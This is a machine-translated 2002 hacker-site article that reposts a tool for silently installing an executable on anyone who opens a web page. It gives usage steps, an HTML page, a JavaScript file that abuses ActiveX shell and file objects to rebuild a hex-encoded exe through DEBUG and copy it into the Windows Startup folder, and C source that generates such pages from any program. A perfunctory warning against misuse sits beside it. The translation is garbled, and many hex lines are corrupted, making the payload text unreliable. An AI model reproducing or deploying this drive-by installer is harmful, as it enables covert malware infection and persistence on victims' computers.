Hacker technology (use of the DEBUG loophole) |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>invasion analysis>> hacker technology (use of 
                  the DEBUG loophole)  Printing

            Hacker technology (use of the DEBUG loophole)
            Www.cshu.net  2002-12-20  fog rain village 

              Homepage automatic transmission system, v1.0 
              This procedure may * exe be possible the executive routine (dos, 
              win9x all to be possible) to code a javascript script,
              When some people visit this script, this script can automatically 
              decode the original * exe document, and the preservation is hard 
              in the visitor
              In plate start table of contents, application method as follows:
              Will need the encoded * exe document to duplicate this procedure 
              under the table of contents, and will change name this procedure 
              will be s.exe, the attention
              Cannot take other names, otherwise codes not successfully, then 
              moves the e2h4.exe procedure, after codes successfully can work as
              Under the first table of contents produces 1.htm and the 1.js 
              document, so long as passes to in your individual main page these 
              two documents in,
              Pays attention to two documents to have in the identical table of 
              contents, for instance all puts http://pub.jsol.net/~njhhack/ this
              Under table of contents, when some people look up 
              http://pub.jsol.net/~njhhack/1.htm this homepage, by 1.htm
              Which person's opening can the transfer 1.js script automatically 
              decode tmp.exe (is your encoded s.exe procedure) coexists in
              Moves under the table of contents, when next time he again will 
              open the computer, tmp.exe will be able automatically to carry 
              out, if he has deleted your tmp.exe procedure,
              So long as next time he once more will visit your 
              http://pub.jsol.net/~njhhack/1.htm this homepage, then
              The tmp.exe procedure can die and be reborn in his hard disk, 
              wants above to look the effect may visit this website, has a look
              Effect how, if has not accessed the net, opens under the current 
              directory 1.htm, also may see the effect yo 
              * Warning! ! ! : After everybody do not have to use this procedure 
              puts viral or the wooden horse procedure code on the homepage 
              injures someone, one
              After the discovery, punishes not negligently, Good luck, 
              ha-ha..........
              * Appendix: Because decodes needs the certain time, when visit 
              homepage must wait till on the page to appear a green background 
              the length
              The square shape frame, and appears the "documents in the frame to 
              preserve the successful" these characters only then to be possible 
              to close the homepage, otherwise decodes cannot become
              Merit, moreover, this procedure only can to be smaller than the 
              64k procedure code, is bigger than 64k the procedure not to have 
              this function, wants
              Codes the big procedure please to wait for my second edition! ! !
              ----------------------------------
              2001.8.5 
              Author: Njhhack
              Main page: Hotsky.363.net
              Mailbox: Njhhack@21cn.com

              ----- Under is the homepage -----------
              <HTML>
              <HEAD>
              <TITLE> homepage automatic transmission system </TITLE>
              </HEAD>
              <BODY>
              In the data loading, please wait a bit............
              <SCRIPT SRC=1.js></SCRIPT>
              </BODY>
              </HTML>
              --------- Under is the script are partial ------------
              Document.write ('<APPLET HEIGHT=0 WIDTH=0 
              code=com.ms.activeX.ActiveXComponent></APPLET>');
              Function docsave ()
              {
              A=document.applets [ 0 ];
              A.setCLSID (' {F935dc22-1cf0-11d0-adb9-00c04fd58a0b} ');
              A.createInstance ();
              Wsh=a.GetObject ();
              A.setCLSID (' {0d43fe01-f093-11cf-8940-00a0c9054228} ');
              A.createInstance ();
              Fso=a.GetObject ();
              Var sla='\\';
              Var pat='c:'+sla;
              Var tmp1=pat+'tmp.1';
              Var tmp2=pat+'tmp.2';
              Var tmp3=pat+'tmp.3';
              Var tmp4='tmp.exe';
              Var st=fso.CreateTextFile (tmp1, true);
              St.WriteLine ('n'+tmp3);
              St.WriteLine ('a');
              St.WriteLine ('dw 5a4d 50,204 f ffff 0 b8 00,040 1a');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 001,000 10ba e00 b41f cd09 b821 4c01 21cd 
              90.906854 million 7369');
              St.WriteLine ('dw 7,020 6f72 7,267 6d61 6d20 7375207465627220 6e75 
              7,520 646e 7,265 5720');
              St.WriteLine ('dw 6e69 3,233 a0d 3724000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0.0455 million 14c 4 2ad3 53ef 0,000 e0 818e');
              St.WriteLine ('dw 10b 1902200080000010000100002000 0');
              St.WriteLine ('dw 04010000200010003 a 0 0');
              St.WriteLine ('dw 5000040000020010200000 10');
              St.WriteLine ('dw 100000010000003000090 0');
              St.WriteLine ('dw 0000000000004000 0');
              St.WriteLine ('dw 14000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 4f43 4544001000010000200060000 0');
              St.WriteLine ('dw 00002060004144415400100002000 0');
              St.WriteLine ('dw 4000800000000040 c000 692e 6164');
              St.WriteLine ('dw 6174010000300002000 c00 0,000 0');
              St.WriteLine ('dw 0,040 c000 722e 6c65 636f 01000040000200 0');
              St.WriteLine ('dw e00 0000000405000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw. billion 6a 68');
              St.WriteLine ('dw 40.2068 million 201b 40 6a 7e8 0 6a00 e800 60 
              25ff 304c 40');
              St.WriteLine ('dw 25ff 3054400000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 006,957 646e 776f 20.737839 million 4e2f 2,054 
              e3bb e0b1 beca b6b7 ccb3');
              St.WriteLine ('dw f2d0 d500 cae2 d2c7 b8bb d7f6 bcee b5f2 b5a5 
              57c4 6e69 6f64 7,377 3920');
              St.WriteLine ('dw 2f78 544e 3,320 ce32 bbbb b1e3 d3e0 d1ef b3d4 
              d0cc b5f2 d4c4 d0cb bdd0');
              St.WriteLine ('dw b9e1 dfb b10a b3e0 a3cc c4ba bddf bba8 20aa be20 
              c7b4 b9eb c1e2 a3d9');
              St.WriteLine ('dw 68ba 7,474 3a70 2f2f 6f68 7,374 796b 332e 3,336 
              6e2e 7,465 a0d 2,020 2020');
              St.WriteLine ('dw 2020202020202020202020202020 efa1 efa1 efa1 efa1 
              efa1 a0d 2d2d');
              St.WriteLine ('dw 2d2d 2d2d 2d2d 2d2d 2d2d e0b1 ebd2 b4c1 d3bd 
              bdb7 bdca baa3 4,154 4d53');
              St.WriteLine ('dw 3,520 302e 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 
              d2d 740a 7,361 336d 2032');
              St.WriteLine ('dw 2f20 6c6d 2,020 6d2f 20.326974 million 796e a0d 
              6c74 6e69 336b 2,032 542f 6570');
              St.WriteLine ('dw 2f20 61.61742 million 6e69 2,079 202c 202c 202c 
              2e2e 6c5c 6,269 695c 706d 726f');
              St.WriteLine ('dw 3,374 2e32 696c d62 2d0a 2d2d 2d2d 2d2d 2d2d 
              2d2d 2d2d 2d2d 2d2d d4d2');
              St.WriteLine ('dw c2cf c7ca ccb3 f2d0 fdd5 c4ce 2d2d 2d2d 2d2d 
              2d2d 2d2d 2d2d 2d2d 2d2d');
              St.WriteLine ('dw 2d2d a0d 2020202020202020 352e 3,638 d70 200a 
              202.02020202 billion 2e20');
              St.WriteLine ('dw 6f6d 6,564 206c 6c66 7,461 532c 44.544143 
              million 4c4c a0d 78.657274 million 206e 2020');
              St.WriteLine ('dw 4d20 736.561736567 billion 6f42 4,178 503a 4f52 
              d43 650a 7,478 6e72 2,020 2020');
              St.WriteLine ('dw 784.57469725 billion 636f 7,365 3a73 5,250 434f 
              a0d 2020202020202020 642e');
              St.WriteLine ('dw 7,461 d61 740a 7,469 656c 2020202062642220 b0b4 
              dabf eab1 e2cc 2c22');
              St.WriteLine ('dw d30 6d0a 736561736567202062642220 b0b4 dabf c5d0 
              a2cf 2c22 d30');
              St.WriteLine ('dw 200a 202.02020202 billion 2e20 6f63 6,564 a0d 
              65.626967 million 3a6e a0d 2,020 2020');
              St.WriteLine ('dw 202.020206163 billion 6c6c 4d20 736.561736567 
              billion 6f42 4,178 302c 4f2c 4,646 4553');
              St.WriteLine ('dw 2,054 656d 73.736761 million 2c65 464f 
              5346544574207469 656c 302c a0d 2020');
              St.WriteLine ('dw 2020202020206163 6c6c 452.069785074 billion 6f72 
              65.637373 million 302c a0d 2020');
              St.WriteLine ('dw 202.02020202 billion 6e65 7,364 a0d 
              2020202020202020 6e65 20.646562 million 6967');
              St.WriteLine ('dw 6e. billion 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw. billion 303c 00 0');
              St.WriteLine ('dw 00 305c 0 304c 03044000003067 0');
              St.WriteLine ('dw 3054000000000003074 0');
              St.WriteLine ('dw 0030820003074000308200 0');
              St.WriteLine ('dw 535.552453233 billion 642e 6c6c 4b00 5,245 454e 
              334c 2e32 6c64 6c 0 654d');
              St.WriteLine ('dw 737.367614265 billion 786f 410784574697250 636f 
              7.36573 million 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 1000014030033008 301c 302.2 million 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 0000000000000 0');
              St.WriteLine ('dw 000 0');
              St.WriteBlankLines (1);
              St.WriteLine ('rbx');
              St.WriteLine ('0');
              St.WriteLine ('rcx');
              St.WriteLine ('1000');
              St.WriteLine ('w');
              St.WriteLine ('q');
              St.Close ();
              Var exe=wsh.RegRead 
              ('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell 
              Folders\\Startup') +'\\'+tmp4;
              Wsh.Run ('command /c debug <'+tmp1+'>'+tmp2, false,6);
              Fso.GetFile (tmp3) Copy (exe);
              Fso.GetFile (tmp1) Delete ();
              Fso.GetFile (tmp2) Delete ();
              Fso.GetFile (tmp3) Delete ();
              Frk.document.write ('<body height=40 the bgcolor=#c0e0d0> 
              documents preserve successfully! ! ! </body>');
              }
              SetTimeout ('docsave () ',1,000);
              Document.write ('<br> is preserving the documents, please wait a 
              bit.........' ;
              Document.write ('<br><iframe id=frk frameborder=0 width=200 
              height=50></'+'iframe>');
              Document.write ('<br> thanks uses this software ');
              Document.write ('<br> author: Njhhack main page: <a 
              href=http://hotsky.363.net>hotsky.363.net</a>');
              Document.write ('<br> mailbox: Mailto:njhhack@21cn.com 
              OICQ:10772919');
              Document.write ('<br> procedure: <a 
              href=http://pub.jsol.net/~njhhack/programming/source/autodown.zip> 
              downloads in the </a>/ procedure to include the c source code and 
              the use help! ! ! ' ;
              Document.write ('<br> (C) CopyRight 2001.8.5 HackSoft Research 
              Lab. ' ;
              ------------- Under is the encoded c source program ------------
              /*
              Homepage automatic transmission system, v1.0
              2001.8.5 
              Author: Njhhack
              Main page: Hotsky.363.net
              Mailbox: Njhhack@21cn.com
              */
              #include<stdio.h>
              Main ()
              {
              FILE *fp, *fbin;
              Unsigned int sbuf [ 1024*4 ];
              Unsigned int k, h, rest;
              Unsigned long int pos, num;
              Fp=fopen ("1.htm", "wt");
              Fprintf (fp, "<HTML>\n<HEAD>\n<TITLE> homepage automatic 
              transmission system </TITLE>\n</HEAD>\n<BODY>");
              Fprintf (fp, "in the \n data loading, please wait a 
              bit............" ;
              Fprintf (fp, "\n<SCRIPT SRC=1.js></SCRIPT>");
              Fprintf (fp, "\n</BODY>\n</HTML>");
              Fclose (fp);

              Fp=fopen ("1.js", "wt");
              Fprintf (fp, "\ndocument.write ('<APPLET HEIGHT=0 WIDTH=0 
              code=com.ms.activeX.ActiveXComponent></APPLET>');" ;
              Fprintf (fp, "\nfunction docsave ()");
              Fprintf (fp, "\n {");
              Fprintf (fp, "\na=document.applets [ 0 ];" ;
              Fprintf (fp, "\na.setCLSID (' 
              {F935dc22-1cf0-11d0-adb9-00c04fd58a0b} ');" ;
              Fprintf (fp, "\na.createInstance ();" ;
              Fprintf (fp, "\nwsh=a.GetObject ();" ;
              Fprintf (fp, "\na.setCLSID (' 
              {0d43fe01-f093-11cf-8940-00a0c9054228} ');" ;
              Fprintf (fp, "\na.createInstance ();" ;
              Fprintf (fp, "\nfso=a.GetObject ();" ;
              Fprintf (fp, "\nvar sla='\\\\';" ;
              Fprintf (fp, "\nvar pat='c:'+sla;" ;
              Fprintf (fp, "\nvar tmp1=pat+'tmp.1';" ;
              Fprintf (fp, "\nvar tmp2=pat+'tmp.2';" ;
              Fprintf (fp, "\nvar tmp3=pat+'tmp.3';" ;
              Fprintf (fp, "\nvar tmp4='tmp.exe';" ;

              Fprintf (fp, "\nvar st=fso.CreateTextFile (tmp1, true);" ;
              Fprintf (fp, "\nst.WriteLine ('n'+tmp3);" ;
              Fprintf (fp, "\nst.WriteLine ('a');" ;
              Under /* transforms partial */ as the data
              Fbin=fopen ("s.exe", "rb");
              Fseek (fbin,0, SEEK_END);
              Pos=ftell (fbin);
              Num=0;
              While (1)
              {
              Fseek (fbin, num, SEEK_SET);
              If (pos-num<=4096) rest= (unsigned int) (pos-num) /2;
              Else rest=4096/2;
              Fread (sbuf,2, rest, fbin);
              K=0;
              While (1)
              {
              Fprintf (fp, "\nst.WriteLine ('dw");
              For (h=0; H<14; H++)
              {
              Fprintf (fp, "%x", sbuf [ k ]);
              K++;
              If (k>=rest) break;
              }
              Fprintf (fp, "');" ;
              If (k>=rest) break;
              }
              Num+=4096l;
              If (pos<=num) break;
              }
              Fclose (fbin);
              The /* data transformation finished */
              Fprintf (fp, "\nst.WriteBlankLines (1);" ;
              Fprintf (fp, "\nst.WriteLine ('rbx');" ;
              Fprintf (fp, "\nst.WriteLine ('%x');" (pos>>16) &0xffff);
              Fprintf (fp, "\nst.WriteLine ('rcx');" ;
              Fprintf (fp, "\nst.WriteLine ('%x');" Pos&0xffff);
              Fprintf (fp, "\nst.WriteLine ('w');" ;
              Fprintf (fp, "\nst.WriteLine ('q');" ;
              Fprintf (fp, "\nst.Close ();" ;
              Fprintf (fp, "\nvar exe=wsh.RegRead 
              ('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell 
              Folders\\\\Startup') +'\\\\'+tmp4;" ;
              Fprintf (fp, "\nwsh.Run ('command /c debug <'+tmp1+'>'+tmp2, 
              false,6);" ;
              Fprintf (fp, "\nfso.GetFile (tmp3) Copy (exe);" ;
              Fprintf (fp, "\nfso.GetFile (tmp1) Delete ();" ;
              Fprintf (fp, "\nfso.GetFile (tmp2) Delete ();" ;
              Fprintf (fp, "\nfso.GetFile (tmp3) Delete ();" ;
              Fprintf (fp, "\n frk.document.write ('<body height=40 the 
              bgcolor=#c0e0d0> documents preserve successfully! ! ! </body>');" 
;
              Fprintf (fp, "\n}");
              Fprintf (fp, "\nsetTimeout ('docsave () ',1,000);" ;
              Fprintf (fp, "\ndocument.write ('<br> is preserving the documents, 
              please wait a bit.........' ; " ;
              Fprintf (fp, "\ndocument.write ('<br><iframe id=frk frameborder=0 
              width=200 height=50></'+'iframe>');" ;
              Fprintf (fp, "\ndocument.write ('<br> thanks uses this software 
              ');" ;
              Fprintf (fp, "\ndocument.write ('<br> author: Njhhack main page: 
              <a href=http://hotsky.363.net>hotsky.363.net</a>');" ;
              Fprintf (fp, "\ndocument.write ('<br> mailbox: 
              Mailto:njhhack@21cn.com OICQ:10772919');" ;
              Fprintf (fp, "\ndocument.write ('<br> procedure: <a 
              href=http://pub.jsol.net/~njhhack/programming/source/autodown.zip> 
              downloads in the </a>/ procedure to include the c source code and 
              the use help! ! ! ' ; " ;
              Fprintf (fp, "\ndocument.write ('<br> (C) CopyRight 2001.8.5 
              HackSoft Research Lab. ' ; " ;
              Fclose (fp);
              }



              Original author: . 
              Origin: . 
              Altogether has 380 readers to read this article 

              [Tells friend] 
            Previous article:Invades the hypothesized main engine the simple 
            plan 

            Next article:Looks over in 2002, viral and the counter- viral 
            technology big collision 

            - this week popular article - related article 
            The nc.exe high-level skill application compiles
            QQ attack code
            Hacker technology (use of the DEBUG loophole)
            Invades the hypothesized main engine the simple plan
            The local area network winds viral invasion principle and its guard 
            method
            The security receives in OutLook not the security appendix
            NT loophole summary and use



      CSHU 
